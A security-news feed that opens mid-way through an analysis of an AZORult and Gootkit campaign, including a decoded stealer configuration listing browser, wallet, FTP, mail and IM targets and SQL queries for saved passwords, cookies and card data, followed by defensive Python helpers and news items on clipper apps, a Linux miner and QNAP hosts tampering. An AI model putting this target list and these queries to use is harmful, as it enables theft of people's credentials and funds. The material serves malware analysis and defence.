  33. %LOCALAPPDATA%\Google\Chrome\User Data\
  34. %LOCALAPPDATA%\Google\Chrome SxS\User Data\
  35. %LOCALAPPDATA%\Xpom\User Data\
  36. %LOCALAPPDATA%\Yandex\YandexBrowser\User Data\
  37. %LOCALAPPDATA%\Comodo\Dragon\User Data\
  38. %LOCALAPPDATA%\Amigo\User Data\
  39. %LOCALAPPDATA%\Orbitum\User Data\
  40. %LOCALAPPDATA%\Bromium\User Data\
  41. %LOCALAPPDATA%\Chromium\User Data\
  42. %LOCALAPPDATA%\Nichrome\User Data\
  43. %LOCALAPPDATA%\RockMelt\User Data\
  44. %LOCALAPPDATA%\360Browser\Browser\User Data\
  45. %LOCALAPPDATA%\Vivaldi\User Data\
  46. %APPDATA%\Opera Software\
  47. %LOCALAPPDATA%\Go!\User Data\
  48. %LOCALAPPDATA%\Sputnik\Sputnik\User Data\
  49. %LOCALAPPDATA%\Kometa\User Data\
  50. %LOCALAPPDATA%\uCozMedia\Uran\User Data\
  51. %LOCALAPPDATA%\QIP Surf\User Data\
  52. %LOCALAPPDATA%\Epic Privacy Browser\User Data\
  53. %APPDATA%\brave\
  54. %LOCALAPPDATA%\CocCoc\Browser\User Data\
  55. %LOCALAPPDATA%\CentBrowser\User Data\
  56. %LOCALAPPDATA%\7Star\7Star\User Data\
  57. %LOCALAPPDATA%\Elements Browser\User Data\
  58. %LOCALAPPDATA%\TorBro\Profile\
  59. %LOCALAPPDATA%\Suhba\User Data\
  60. %LOCALAPPDATA%\Safer Technologies\Secure Browser\User Data\
  61. %LOCALAPPDATA%\Rafotech\Mustang\User Data\
  62. %LOCALAPPDATA%\Superbird\User Data\
  63. %LOCALAPPDATA%\Chedot\User Data\
  64. %LOCALAPPDATA%\Torch\User Data\
  65. GoogleChrome
  66. GoogleChrome64
  67. InternetMailRu
  68. YandexBrowser
  69. ComodoDragon
  70. Amigo
  71. Orbitum
  72. Bromium
  73. Chromium
  74. Nichrome
  75. RockMelt
  76. 360Browser
  77. Vivaldi
  78. Opera
  79. GoBrowser
  80. Sputnik
  81. Kometa
  82. Uran
  83. QIPSurf
  84. Epic
  85. Brave
  86. CocCoc
  87. CentBrowser
  88. 7Star
  89. ElementsBrowser
  90. TorBro
  91. Suhba
  92. SaferBrowser
  93. Mustang
  94. Superbird
  95. Chedot
  96. Torch
  97. Login Data
  98. Web Data
  99. SELECT origin_url, username_value, password_value FROM logins
  100. SELECT host_key, name, encrypted_value, value, path, secure, (expires_utc/1000000)-11644473600 FROM cookies
  101. SELECT host_key, name, name, value, path, secure, expires_utc FROM cookies
  102. SELECT name, value FROM autofill
  103. SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted value FROM credit_cards
  104. %APPDATA%\Microsoft\Windows\Cookies\
  105. %APPDATA%\Microsoft\Windows\Cookies\Low\
  106. %LOCALAPPDATA%\Microsoft\Windows\INetCache\
  107. %LOCALAPPDATA%\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCookies\
  108. %LOCALAPPDATA%\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\
  109. %LOCALAPPDATA%\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!002\MicrosoftEdge\Cookies\
  110. %LOCALAPPDATA%\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cookies\
  111. InternetExplorer
  112. InternetExplorerLow
  113. InternetExplorerINetCache
  114. MicrosoftEdge_AC_INetCookies
  115. MicrosoftEdge_AC_001
  116. MicrosoftEdge_AC_002
  117. MicrosoftEdge_AC
  118. Software\Microsoft\Internet Explorer
  119. Software\Microsoft\Internet Explorer\IntelliForms\Storage2
  120. Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
  121. Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
  122. Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
  123. POP3
  124. IMAP
  125. SMTP
  126. HTTP
  127. %appdata%\Waterfox\Profiles\
  128. Waterfox
  129. %appdata%\Comodo\IceDragon\Profiles\
  130. IceDragon
  131. %appdata%\8pecxstudios\Cyberfox\Profiles\
  132. Cyberfox
  133. sqlite3_open
  134. sqlite3_close
  135. sqlite3_prepare_v2
  136. sqlite3_step
  137. sqlite3_column_text
  138. sqlite3_column_bytes
  139. sqlite3_finalize
  140. %APPDATA%\filezilla\recentservers.xml
  141. <RecentServers>
  142. </RecentServers>
  143. <Server>
  144. </Server>
  145. <Host>
  146. </Host>
  147. <Port>
  148. </Port>
  149. <User>
  150. </User>
  151. <Pass>
  152. </Pass>
  153. <Pass encoding="base64">
  154. FileZilla
  155. ole32.dll
  156. CLSIDFromString
  157. {4BF4C442-9B8A-41A0-B380-DD4A704DDB28}
  158. {3CCD5499-87A8-4B10-A215-608888DD3B55}
  159. vaultcli.dll
  160. VaultOpenVault
  161. VaultEnumerateItems
  162. VaultGetItem
  163. MicrosoftEdge
  164. Browsers\AutoComplete
  165. CookieList.txt
  166. SELECT host_key, name, encrypted_value, value, path, is_secure, (expires_utc/1000000)-11644473600 FROM cookies
  167. %appdata%\Moonchild Productions\Pale Moon\Profiles\
  168. PaleMoon
  169. %appdata%\Electrum\wallets\
  170. \Electrum
  171. %appdata%\Electrum-LTC\wallets\
  172. \Electrum-LTC
  173. %appdata%\ElectrumG\wallets\
  174. \ElectrumG
  175. %appdata%\Electrum-btcp\wallets\
  176. \Electrum-btcp
  177. %APPDATA%\Ethereum\keystore\
  178. \Ethereum
  179. %APPDATA%\Exodus\
  180. \Exodus
  181. \Exodus Eden
  182. *.json,*.seco
  183. %APPDATA%\Jaxx\Local Storage\
  184. \Jaxx\Local Storage\
  185. %APPDATA%\MultiBitHD\
  186. \MultiBitHD
  187. mbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml
  188. .wallet
  189. wallets\.wallet
  190. wallet.dat
  191. wallets\wallet.dat
  192. electrum.dat
  193. wallets\electrum.dat
  194. Software\monero-project\monero-core
  195. wallet_path
  196. Bitcoin\Bitcoin-Qt
  197. BitcoinGold\BitcoinGold-Qt
  198. BitCore\BitCore-Qt
  199. Litecoin\Litecoin-Qt
  200. BitcoinABC\BitcoinABC-Qt
  201. %APPDATA%\Exodus Eden\
  202. %Appdata%\Psi+\profiles\
  203. %Appdata%\Psi\profiles\
  204. <roster-cache>
  205. </roster-cache>
  206. <jid type="QString">
  207. <password type="QString">
  208. </password>

Table 3: AZORult Configuration file

The multiple references to browser cookies and cryptocurrency wallets confirm that the “RuntimeBroker5.exe” sample, initially hidden inside the cabinet archive, is an AZORult variant.
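The confirmation step just described, reading a decoded configuration for the artifacts it targets, can be partly automated. The following Python triage helper is an added example and not part of the Yoroi analysis; its bucket regexes are my own heuristics written against the kinds of entries visible in Table 3, and SAMPLE_CONFIG is a constructed excerpt of that table.

```python
import re
from collections import Counter

# Heuristic buckets for the string types an info-stealer configuration carries.
# Patterns are ordered: the first bucket whose regex matches wins.
CATEGORIES = [
    ("browser_profile_path",   re.compile(r"\\User Data\\$|\\Profiles?\\$", re.I)),
    ("browser_db_query",       re.compile(r"^SELECT .+ FROM (logins|cookies|autofill|credit_cards|moz_\w+)", re.I)),
    ("mozilla_nss_api",        re.compile(r"^(NSS_|PK11)")),
    ("sqlite_api",             re.compile(r"^sqlite3_")),
    ("windows_vault_api",      re.compile(r"^Vault\w+$|^vaultcli\.dll$")),
    ("ftp_client_artifact",    re.compile(r"filezilla|recentservers\.xml|^<Pass[ >]", re.I)),
    ("mail_client_artifact",   re.compile(r"\\Outlook(\\|$)|Thunderbird|^(POP3|IMAP|SMTP)$", re.I)),
    ("crypto_wallet_artifact", re.compile(r"wallets?\\|wallet\.dat|\.wallet$|Electrum|Ethereum\\keystore|Exodus|Jaxx|MultiBitHD|monero|-Qt$", re.I)),
    ("im_client_artifact",     re.compile(r"Psi\+?\\profiles|roster-cache|^<jid|^<password", re.I)),
    ("registry_key",           re.compile(r"^SOFTWARE\\", re.I)),
]

# Which buckets, taken together, imply which stealer capability.
CAPABILITY_RULES = {
    "steals_browser_credentials": {"browser_profile_path", "browser_db_query"},
    "steals_crypto_wallets":      {"crypto_wallet_artifact"},
    "steals_ftp_credentials":     {"ftp_client_artifact"},
    "steals_mail_credentials":    {"mail_client_artifact"},
    "steals_im_credentials":      {"im_client_artifact"},
    "reads_windows_vault":        {"windows_vault_api"},
}


def classify(entry: str) -> str:
    """Assign one configuration string to the first matching bucket."""
    for name, pattern in CATEGORIES:
        if pattern.search(entry):
            return name
    return "other"


def profile_config(entries) -> Counter:
    """Count how many configuration strings fall into each bucket."""
    return Counter(classify(e) for e in entries)


def infer_capabilities(counts: Counter) -> list:
    """Name the capabilities whose required buckets are all present."""
    present = {bucket for bucket, n in counts.items() if n > 0}
    return sorted(cap for cap, needed in CAPABILITY_RULES.items() if needed <= present)


# Constructed sample: a short excerpt of the decoded configuration in Table 3.
SAMPLE_CONFIG = [
    "%appdata%\\Mozilla\\Firefox\\Profiles\\",
    "SELECT host, path, isSecure, expiry, name, value FROM moz_cookies",
    "PK11SDR_Decrypt",
    "%LOCALAPPDATA%\\Google\\Chrome\\User Data\\",
    "SELECT origin_url, username_value, password_value FROM logins",
    "sqlite3_prepare_v2",
    "%APPDATA%\\filezilla\\recentservers.xml",
    "vaultcli.dll",
    "VaultEnumerateItems",
    "Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook",
    "%appdata%\\Electrum\\wallets\\",
    "wallet.dat",
    "Software\\monero-project\\monero-core",
    '<jid type="QString">',
    "CurrentVersion",
]

if __name__ == "__main__":
    counts = profile_config(SAMPLE_CONFIG)
    for bucket, n in counts.most_common():
        print(f"{bucket:24s} {n}")
    print("inferred capabilities:", ", ".join(infer_capabilities(counts)))
```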

Stage 3 – The Payload

The other file downloaded from hairpd[.]com by the AZORult sample is another PE32 executable.

Figure 8: GET request to download the payload.

Hash: a75b318eb2ae6678fd15f252d6b33919203262eb59e08ac32928f8bad54ca612
Threat: sputik.exe
Desc: Second component downloaded by the malware. This component stays alive after the infection.

Table 4: Generic information about sputik.exe (Gootkit)

The “sputik.exe” sample uses a set of evasion techniques to hinder monitoring of the process, such as invoking the “UuidCreateSequential” API to detect MAC addresses typical of virtual machines; this technique, however, can be easily bypassed by spoofing the MAC address of a real network card.

Figure 9: Evasion technique through the check “UuidCreateSequential” API call

Bypassing all the evasion techniques reveals the nature of the payload: a Gootkit malware implant.

Figure 10: Command line of the final sample

By instrumenting the execution of the implant, we were able to extract part of the malware’s JavaScript code. The Gootkit implant comprises several modules written on top of Node.js and embedded into the PE file, which reveal part of the implant code.

Figure 11: Portion of Gootkit code snippet

In past years, Gootkit source code has been leaked online, and part of it is also available on GitHub. This allowed us to investigate the differences between the extracted snippets and the known, previously leaked, malware version.

Figure 12: Comparison between extracted Gootkit version and the leaked one

As a general consideration, we noticed many similarities between the two code bases: they are perfectly compatible, but a few differences hold. For instance, private keys and certificates have been modified, showing that the malware author chose a stronger key.

Table 5:  Certificate comparison 
(New on the left, known/leaked on the right)

Conclusion

These attack waves targeting Italian organizations and users revealed interesting connections between two threats we were used to monitoring and detecting across both the InfoSec community and the CERT-Yoroi constituency, revealing a hidden link between this particular AZORult instance and the Gootkit implant.

Also, the analysis pointed to an evolution of the dropping techniques used by cyber-criminals in the initial stages of the attacks, showing how the use of extremely flexible stagers written in high-level languages, JavaScript in this case, is becoming more popular and needs to be carefully monitored.

Further details, including Indicators of Compromise (IoCs), are reported in the analysis published on the Yoroi Blog.

Pierluigi Paganini

(SecurityAffairs – AZORult, gootkit)

The post Gootkit: Unveiling the Hidden Link with AZORult appeared first on Security Affairs.



An info stealer .exe malware is targeting Mac users around the globe

By Waqas

Cybercriminals have identified a unique method of attacking Mac devices, which involves exploiting executable or .EXE files. Those files that can be executed both on Mac and Windows devices have the potential of infecting Mac computers as these unload a .exe malware. Discovered by Trend Micro researchers, the new malware can bypass the macOS security […]

This is a post from HackRead.com. Read the original post: An info stealer .exe malware is targeting Mac users around the globe

New cryptomining malware removes other malware from Linux, then latches onto systems

A script capable of deleting known Linux malware and coin mining software in systems has been discovered by Trend Micro.  It then downloads a cryptocurrency-mining malware as well as install

The post New cryptomining malware removes other malware from Linux, then latches onto systems appeared first on The Cyber Security Place.

88% of UK businesses breached during the last 12 months

The UK’s cyber threat environment is intensifying. Attacks are growing in volume, and the average number of breaches has increased, according to Carbon Black. Key survey research findings: 88% of UK organizations reported suffering a breach in the last 12 months; the average number of breaches per organization over the past year was 3.67; 87% of organizations have seen an increase in attack volumes; 89% of organizations say attacks have become more sophisticated; 93% of … More

The post 88% of UK businesses breached during the last 12 months appeared first on Help Net Security.

MetaMask app on Google Play was a Clipboard Hijacker

Security researcher Lukas Stefanko from ESET discovered the first Android cryptocurrency clipboard hijacker impersonating MetaMask on the official Google Play store.

The rogue MetaMask app is a Clipboard Hijacker that monitors a device’s clipboard for Bitcoin and Ethereum addresses and replaces them with addresses of wallets under the attacker’s control. Using this trick, the attackers can transfer funds to their own wallets.

“This dangerous form of malware first made its rounds in 2017 on the Windows platform and was spotted in shady Android app stores in the summer of 2018. In February 2019, we discovered a malicious clipper on Google Play, the official Android app store.” reads the post published by ESET.

MetaMask clipboard hijacker

The Clipboard Hijacker poses as a mobile version of the legitimate service MetaMask.io, which is designed to run Ethereum decentralized apps in a browser without having to run a full Ethereum node.

However, the legitimate service currently does not offer a mobile app.

Lukas Stefanko discovered that the app was able to steal cryptocurrency using two different attack methods.

The first attack scenario sees attackers using the app to attempt to steal the private keys and seeds of an Ethereum wallet when a user adds it to the app. Once obtained, this data is sent to a Telegram account.

The second attack scenario sees attackers monitoring the clipboard for Ethereum and Bitcoin addresses and, when one is detected, replacing it with the attackers’ address.

In June 2017, security researchers from Qihoo 360 Total Security spotted a new malware campaign spreading a clipboard hijacker, tracked as ClipboardWalletHijacker, that infected over 300,000 computers. Most of the victims are located in Asia, mainly China.

In July 2017, BleepingComputer discovered a cryptocurrency clipboard hijacker monitoring more than 2.3 million addresses.

In March 2018, security researchers at Palo Alto Networks spotted a strain of malware dubbed ComboJack that is able to detect when users copy a cryptocurrency address to the Windows clipboard. The malicious code then replaces the address in the clipboard with the author’s own.

Pierluigi Paganini

(SecurityAffairs – Clipboard Hijacker, MetaMask)

The post MetaMask app on Google Play was a Clipboard Hijacker appeared first on Security Affairs.

New Linux Crypto-Mining Malware Kills Other Malicious Miners Upon Installation

Security analysts identified a sample of Linux crypto-mining malware that kills any other malicious miners upon installation.

Trend Micro researchers discovered the malware while doing a routine log check after spotting a script within one of their honeypots that began downloading a binary connected to a domain. This binary turned out to be a modified version of the cryptocurrency miner XMR-Stak.

The script didn’t stop at downloading this sample of Linux malware, which Trend Micro detected as Coinminer.Linux.MALXMR.UWEIU. It removed other crypto-mining malware and related services affecting the machine at the time of infection. The malware also created new directories and files and stopped processes that shared connections with known IP addresses.

A Likeness to Other Threats

In their analysis of Coinminer.Linux.MALXMR.UWEIU, Trend Micro found that the malware’s script shares certain attributes with other threats it previously detected. Specifically, researchers observed similarities between this malicious coin miner and Xbash, a malware family discovered by Trend Micro in September 2018 that combines ransomware, cryptocurrency mining, worm and scanner capabilities in its attacks against Linux and Windows servers.

Researchers also noted that the threat’s code is nearly identical to that of KORKERDS, crypto-mining malware Trend Micro uncovered back in November 2018. There are a few differences, however.

The new script simplified the routine by which KORKERDS downloads and executes files and loads the Linux coin malware sample. It also didn’t uninstall security solutions from or install a rootkit on the infected machine. In fact, the script’s kill list targeted both KORKERDS and its rootkit component. This move suggests that those who coded the script are attempting to maximize their profits while competing with the authors of KORKERDS.

Strengthen Your Crypto-Mining Malware Defenses

Security professionals can help defend against Linux crypto-mining malware by using an endpoint management and security platform capable of monitoring endpoints for suspicious behavior. Organizations should also leverage security information and event management (SIEM) tools that can notify security teams of high central processing unit (CPU) and graphics processing unit (GPU) usage — key indicators of cryptocurrency mining activities — during nonbusiness hours.

The post New Linux Crypto-Mining Malware Kills Other Malicious Miners Upon Installation appeared first on Security Intelligence.

Clipper Malware Found Masquerading as Legitimate Service on Google Play Store

Security researchers discovered a sample of clipper malware that targeted Android users by lurking in the Google Play store.

ESET first came across Android/Clipper.C masquerading as MetaMask, a service that allows users to access Ethereum-enabled distributed applications, in February 2019. This new threat is capable of stealing users’ credentials and private keys to gain access to their Ethereum funds. But Android/Clipper.C is a bit more sophisticated: It’s also a form of clipper malware in that it can replace a bitcoin or Ethereum wallet address copied from the clipboard with one under the attacker’s control.

ESET researchers discovered the malicious app on the Google Play store shortly after it became available for download on Feb. 1. They reported their findings to Google’s security team, which subsequently removed the app from the app marketplace.

Android/Clipper.C is not the only malware sample that’s impersonated MetaMask. Other programs used the MetaMask disguise to phish for sensitive data and steal access to users’ cryptocurrency funds.

The Growing Problem of Clipper Malware

Android/Clipper.C is just the latest instance of clipper malware to prey on users. In March 2018, ESET learned about one sample of this threat category targeting Monero users by masquerading as a Win32 Disk Imager application on download.com.

A few months later, Bleeping Computer discovered another cryptocurrency clipboard hijacker that was monitoring 2.3 million cryptocurrency addresses at the time of discovery. Dr.Web also uncovered an Android clipper in summer 2018, though this threat was not available for download on the Google Play store at that time.

How to Defend Against Disguised Malware Threats

Security professionals can help defend against threats like Android/Clipper.C by investing in a unified endpoint management (UEM) solution that can alert users when malware is detected and automatically uninstall infected apps. They should also leverage artificial intelligence (AI) to spot malicious behaviors and stop malware like Android/Clipper.C in its tracks.

The post Clipper Malware Found Masquerading as Legitimate Service on Google Play Store appeared first on Security Intelligence.

A mysterious code prevents QNAP NAS devices to be updated

Users of QNAP NAS devices are reporting in the QNAP forum that mysterious code adds entries to their devices that prevent software updates.

Users of the network attached storage devices manufactured by QNAP have reported a string of mysterious malware attacks that disable software updates by hijacking entries in the hosts file of the affected machines.

According to the users, the malicious code adds some 700 entries to the /etc/hosts file that redirect requests to the IP address 0.0.0.0.

QNAP TS-253A

The user ianch99 in the QNAP NAS community forum reported that the antivirus ClamAV was failing to update due to 0.0.0.0 clamav.net host file entries.

“Since recent firmware updates, the ClamAV Antivirus fails to update due to 700+ clamav.net entries in /etc/hosts, all set to 0.0.0.0 e.g.” wrote the user ianch99.

“0.0.0.0 bugs.clamav.net
0.0.0.0 current.cvd.clamav.net
0.0.0.0 database.clamav.net
0.0.0.0 db.local.clamav.net
0.0.0.0 update.nai.com
0.0.0.0 db.ac.clamav.net
0.0.0.0 db.ac.ipv6.clamav.net
0.0.0.0 db.ac.big.clamav.net
<snip>

As they are all set to 0.0.0.0, the ClamAV update fails. If you remove these entries, the update runs fine but they return after rebooting.”

Other users reported similar problems with the MalwareRemover app, but it is still unclear whether the events are linked.

QNAP provided a script that helps users restore normal operations by deleting the mysterious entries.

QNAP hasn’t confirmed that the incidents were caused by malware.
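The check a NAS administrator would want here, as an added example that is neither QNAP's recovery script nor code from the forum thread: it parses a hosts file, flags lines that map an update domain to 0.0.0.0 (or another assumed sinkhole address) and can write a cleaned copy. The watched-domain list, the sinkhole list and the sample hosts file are constructed.

```python
"""Audit a hosts file for entries that sinkhole update servers.

Added example, not QNAP's recovery script and not code from the forum
thread: it parses /etc/hosts, flags lines that map an update domain to
0.0.0.0 (or another sinkhole address) and can write a cleaned copy.
"""
import re
import shutil
from pathlib import Path

# Domains worth protecting. clamav.net and nai.com appear in the forum
# report; qnap.com is an assumed addition for firmware/app updates.
WATCHED_DOMAINS = ("clamav.net", "nai.com", "qnap.com")
# Addresses that silently blackhole a lookup (assumed list).
SINKHOLE_IPS = {"0.0.0.0", "127.0.0.1", "::", "::1"}

_HOSTS_LINE = re.compile(r"^\s*(?P<ip>\S+)\s+(?P<names>[^#]*?)\s*(?:#.*)?$")


def parse_hosts(text):
    """Yield (line_no, ip, names) for every address line in a hosts file."""
    for line_no, raw in enumerate(text.splitlines(), 1):
        if not raw.strip() or raw.lstrip().startswith("#"):
            continue
        match = _HOSTS_LINE.match(raw)
        if match is None or not match.group("names"):
            continue
        yield line_no, match.group("ip"), match.group("names").split()


def is_watched(name):
    """True if name is one of the watched domains or a subdomain of one."""
    name = name.lower().rstrip(".")
    return any(name == d or name.endswith("." + d) for d in WATCHED_DOMAINS)


def find_sinkholed(text):
    """Return [(line_no, ip, [watched names])] for blackholed update hosts.

    Deliberate ad-blocking entries are left alone because only watched
    domains are reported.
    """
    hits = []
    for line_no, ip, names in parse_hosts(text):
        if ip in SINKHOLE_IPS:
            flagged = [n for n in names if is_watched(n)]
            if flagged:
                hits.append((line_no, ip, flagged))
    return hits


def clean_hosts(text):
    """Return (cleaned text, number of lines removed)."""
    bad = {line_no for line_no, _, _ in find_sinkholed(text)}
    kept = [line for i, line in enumerate(text.splitlines(), 1) if i not in bad]
    cleaned = "\n".join(kept)
    if text.endswith("\n"):
        cleaned += "\n"
    return cleaned, len(bad)


def audit_file(path="/etc/hosts", fix=False):
    """Report sinkholed update hosts in a file; with fix=True, back the file
    up to <path>.bak and rewrite it without them. The forum report says the
    entries came back after a reboot, so also look for whatever re-adds them
    (startup scripts, installed apps) rather than relying on cleanup alone."""
    path = Path(path)
    text = path.read_text()
    hits = find_sinkholed(text)
    for line_no, ip, names in hits:
        print(f"{path}:{line_no}: {ip} -> {', '.join(names)}")
    if fix and hits:
        backup = Path(str(path) + ".bak")
        shutil.copy2(path, backup)
        cleaned, removed = clean_hosts(text)
        path.write_text(cleaned)
        print(f"removed {removed} entries, backup in {backup}")
    return hits


# Constructed sample hosts file, modelled on the entries quoted in the thread.
SAMPLE_HOSTS = """\
# constructed sample, not a real device's file
127.0.0.1    localhost
::1          localhost ip6-localhost
192.168.1.20 nas.local
0.0.0.0 bugs.clamav.net
0.0.0.0 current.cvd.clamav.net
0.0.0.0 database.clamav.net
0.0.0.0 update.nai.com
0.0.0.0 ads.example.invalid  # an intentional ad-blocking entry, not flagged
"""

if __name__ == "__main__":
    for line_no, ip, names in find_sinkholed(SAMPLE_HOSTS):
        print(f"line {line_no}: {ip} -> {', '.join(names)}")
```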

“Exposing your NAS on the internet (allowing remote access) is always a high risk thing to do (at least without a properly deployed remote access VPN and/or 2FA on all existing user accounts)!” wrote the user P3R.

“The real problems that I see with Qnap are:

  • The marketing is pushing the private cloud message and tells users that the Qnap solution is a secure way to deploy it. Unfortunately the first part is very attractive to users that don’t understand the risks and the last part is a lie.
  • Qnap have many dangerous things enabled by default and/or without sufficient warnings about the risks.”

Pierluigi Paganini

(SecurityAffairs – NAS, hacking)

The post A mysterious code prevents QNAP NAS devices to be updated appeared first on Security Affairs.

Encrypted malware: a threat facilitated by the GDPR?

Encrypted malware

One of the positive consequences of the increased concern for personal and corporate cybersecurity is the fact that Internet users are increasingly vigilant about their data and who they share it with. At the same time, online platforms have intensified their efforts to provide secure, private browsing in order to safeguard their own and their users’ information.

And this trend is on the up. According to the Global Internet Phenomena Report, written by Sandvine, even very conservative estimates suggest that over 50% of Internet traffic is encrypted. And more and more platforms are turning to end-to-end encryption to ensure that their communications are private.

The GDPR encourages even more encryption

There are several factors that have contributed to the growth of encrypted traffic. It is not simply down to the enormous concern shown by users and companies; legal regulations have also had a hand in it. The GDPR states that companies that handle data “should evaluate the risks inherent in the processing and implement measures to mitigate those risks, such as encryption,” that “should ensure an appropriate level of security, including confidentiality, taking into account (…) the nature of the personal data to be protected.”

In fact, beyond companies’ own willingness to encrypt their communications, there are two cases where the GDPR requires encryption: firstly, when it considers that there is a high risk that this data will be breached; secondly, when said organizations use this data for a different purpose than the one stated to the user when their data was requested. A lack of encryption, therefore, can mean that offending companies are infringing the GDPR (and thus facing the subsequent sanctions of up to €20 million or 4% of the company’s global annual turnover). But that’s not all; encryption can also help these companies, since, if they were to suffer a cyberattack, they wouldn’t need to inform their users about it if their information is correctly encrypted and protected.

A window for encrypted malware

However, all of this has its downside; encrypted traffic is already becoming one of the largest niches for cybercrime: according to Ixia’s 2018 Security Report, cybercriminals are starting to carry out attacks in this kind of traffic. In fact, Gartner states that half of cyberattacks carried out in 2019 using malware will use some kind of encryption, while by 2020, the figure is set to rise to 70%.

There are two particularly worrying things about encrypted malware: the first is the fact that it can be found on platforms that carry encrypted traffic; this means that users, believing themselves to be safe, let their guard down, trust the platform, and thus become more vulnerable. The second is the fact that this malicious software can hide its true nature, meaning that some cybersecurity systems do not detect it until it is too late.

How to avoid encrypted malware attacks

If a company wants to avoid attacks that use encrypted malware, it needs to follow a series of measures that will keep its corporate cybersecurity intact:

1.- Vigilant browsing. When employees are browsing the Internet, they must exercise caution, even when they are on private platforms whose traffic is being encrypted. Although the platform may seem safe to browse, employees need to be as vigilant as they would be in any other circumstances.

2.- Monitoring of processes. Since encrypted malware has the ability to slip past some traditional protection solutions, being able to constantly monitor everything that is happening on the system is more important than ever. Panda Adaptive Defense actively monitors all systems processes in real time, which means that it is able to proactively detect anomalous activity and stop infections before they happen.

3.- Offline backups and online files. More and more companies, when it comes to safeguarding their information, choose to double up: firstly by storing a large part of their information in the cloud, so that their physical devices are not affected in case of infection; secondly, by storing secure backups offline, to keep them from being affected by a later infection.

Encrypted traffic is hugely important to help make networks more secure, and to keep all our information safe; but this doesn’t mean that it is totally attack-proof. Therefore, the more sophisticated cybercriminals become, the more companies should exercise proactive precaution.

The post Encrypted malware: a threat facilitated by the GDPR? appeared first on Panda Security Mediacenter.

First Android Clipboard Hijacking Crypto Malware Found On Google Play Store

A security researcher has discovered yet another cryptocurrency-stealing malware on the official Google Play Store that was designed to secretly steal bitcoin and cryptocurrency from unwitting users. The malware, described as a "Clipper," masqueraded as a legitimate cryptocurrency app and worked by replacing cryptocurrency wallet addresses copied into the Android clipboard with one belonging

What is an advanced persistent threat (APT)? And 5 signs you’ve been hit with one

Do you have valuable data on your network? Noticing odd network behavior? You could be the victim of an APT attack. An advanced persistent threat (APT) is a cyberattack executed

The post What is an advanced persistent threat (APT)? And 5 signs you’ve been hit with one appeared first on The Cyber Security Place.

BEC-style attacks exploded in Q4 2018

Email remains the top vector for malware distribution and phishing, while BEC fraud continues to grow rapidly, Proofpoint warns in its Q4 2018 Threat Report. “The number of email fraud attacks against targeted companies increased 226% Quarter-on-Quarter and 476% vs. Q4 2017,” the company pointed out. “On average, companies targeted by BEC received about 120 fraudulent emails in the fourth quarter of the year, up from 36 in Q3 2018 and up from 21 in … More

The post BEC-style attacks exploded in Q4 2018 appeared first on Help Net Security.

Zero trust browsing: Protect your organization from its own users

To the casual observer, the cyberattack landscape is constantly shifting. In recent years, the threats and scams have evolved from Nigerian princes to stranded travelers, pop-ups warning of outdated software to ransomware, cryptojacking, phishing and spear phishing. Predictions for 2019 are full of dire warnings about the very-real explosion of phishing, backed by geometric increases in phishing sites as the number of malware sites drops. Just as 2018 predictions focused on cryptojacking and ransomware were … More

The post Zero trust browsing: Protect your organization from its own users appeared first on Help Net Security.

New Linux coin miner kills competing malware to maximize profits

Security experts from Trend Micro have discovered a new strain of coin miner that targets the Linux platform and installs the XMR-Stak Cryptonight cryptocurrency miner.

Security experts from Trend Micro have discovered a new strain of coin miner that targets the Linux platform and installs the XMR-Stak Cryptonight cryptocurrency miner. Researchers observed it killing other Linux malware and coin miners present on the infected machine.


The experts detected a coin miner script on one of their honeypots; the malicious code shares some parts with the Xbash malware and with the KORKERDS cryptocurrency miner, which leverages a rootkit to avoid detection.

“We found the script capable of deleting a number of known Linux malware, coin miners, and connections to other miner services and ports, and we observed some parts of the script to be reminiscent of Xbash features and KORKERDS.” reads the analysis published by Trend Micro.

“It installs a cryptocurrency-mining malware as well as implant itself into the system and crontabs to survive reboots and deletions.”

Experts noticed that this specific variant of KORKERDS leverages the rootkit to download a binary of a modified version of a universal Stratum XMR-Stak pool miner.

According to the experts, the infection started from some IP cameras and web services via TCP port 8161, where the attacker attempts to upload a crontab file.

The crontab file launches a second stage that implements the following three functions:

  • Function B kills previously installed malware, coin miners, and all related services referenced by an accompanying malware (detected by Trend Micro as SH.MALXMR.UWEIU). It also creates new directories and files, and stops processes with connections to identified IP addresses.
  • Function D downloads the coin miner binary from hxxp://yxarsh.shop/64 and runs it.
  • Function C downloads a script from hxxp://yxarsh.shop/0, saves it to /usr/local/bin/dns file, and creates a new crontab to call this script at 1 a.m. It also downloads hxxp://yxarsh.shop/1.jpg and puts it in different crontabs.

The malware attempts to hide its presence by clearing system logs and achieves persistence using implanted crontab files.

Compared to the original KORKERDS cryptocurrency miner, the new script improved the way it downloads and executes the files. It inserts a single crontab that fetches all the code and the miner component.

“While a malware routine that includes the removal of other malware in the system is not new, we’ve never seen the removal of Linux malware from the system on this scale. Removing competing malware is just one way cybercriminals are maximizing their profit.” concludes Trend Micro.

Further details, including indicators of compromise, are reported in the analysis published by Trend Micro.

Pierluigi Paganini

(SecurityAffairs – coin miner, malware)

The post New Linux coin miner kills competing malware to maximize profits appeared first on Security Affairs.


Security Affairs newsletter Round 200 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online with a special deal

20% discount

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

Can Enterprises execute a GRC Movement?
Experts observed a new sextortion scam Xvideos-themed
Hacker who reported a flaw in Hungarian Magyar Telekom faces up to 8-years in jail
Experts found popular beauty apps in the Play Store including malicious code
Metro Bank is the first bank that disclosed SS7 attacks against its customers
QuadrigaCX exchange lost access to $145 Million funds after founder dies
Security firm Recorded Future discovered the hacker behind Collection #1
Young hacker gets 10 years jail sentence for SIM Swapping attacks
Roughly 500,000 Ubiquiti devices may be affected by flaw already exploited in the wild
Severe bug in LibreOffice and OpenOffice suites allows remote code execution
SpeakUp Linux Backdoor targets Linux servers in East Asia and LATAM
